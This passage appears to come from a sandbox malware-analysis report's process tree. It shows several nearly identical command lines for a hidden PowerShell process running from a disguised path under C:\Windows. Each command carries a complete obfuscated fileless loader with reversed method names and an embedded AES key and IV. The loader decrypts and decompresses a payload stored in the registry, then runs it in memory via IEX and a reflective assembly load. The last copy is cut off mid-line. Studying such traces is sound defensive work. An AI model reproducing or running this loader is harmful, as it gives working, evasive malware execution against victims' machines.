'')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        29⤵
        
        PID:6092
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6092).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        
        PID:1260
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1260).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        31⤵
        
        PID:4816
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1260).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = 